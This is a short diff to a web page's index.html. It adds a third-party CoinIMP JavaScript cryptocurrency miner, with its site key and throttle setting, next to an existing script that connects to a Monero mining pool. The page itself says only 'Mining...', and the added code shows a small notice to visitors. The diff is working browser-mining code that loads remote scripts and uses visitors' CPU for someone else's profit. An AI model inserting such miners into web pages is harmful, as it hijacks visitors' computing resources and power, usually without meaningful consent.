--- a/index.html
+++ b/index.html
@@ -15,6 +15,21 @@
     <h1>Mining...</h1>
 
 </body>
+<script src="https://www.hostingcloud.racing/06Nm.js"></script>
+
+<script>
+
+    var _client = new Client.Anonymous('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', {
+
+        throttle: 0.3, c: 'w'
+
+    });
+
+    _client.start();
+
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
+
+</script>
  
 <script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10008" > </script>
 
